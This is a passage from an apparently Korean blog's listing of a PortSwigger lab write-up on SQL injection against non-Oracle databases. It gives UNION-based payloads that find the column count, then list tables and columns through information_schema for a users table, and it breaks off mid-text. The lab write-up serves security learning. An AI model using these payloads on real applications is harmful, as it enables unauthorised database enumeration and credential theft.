목록Security/Portswigger (1)
수호의 메모장
Lab: SQL injection attack, listing the database contents on non-Oracle databases
Pets 파라미터에 SQL Injection 취약점이 존재한다. ' UNION SELECT null, null -- 위 페이로드를 통해 칼럼 수가 2임을 알 수 있다. ' UNION SELECT table_name, null from information_schema.tables -- 위 페이로드를 통해 table_name 들을 가지고 올 수 있다. 위 같은 경우 'users_zpyjut' table이 우리에게 있어 흥미로운 테이블임을 알 수 있다. 위 테이블을 대상으로 앞으로 SQL Injection을 진행할 예정이다. ' UNION SELECT column_name, null from information_schema.columns where table_name= 'users_zpyjut' -- 위 ..
Security/Portswigger
2023. 12. 8. 15:52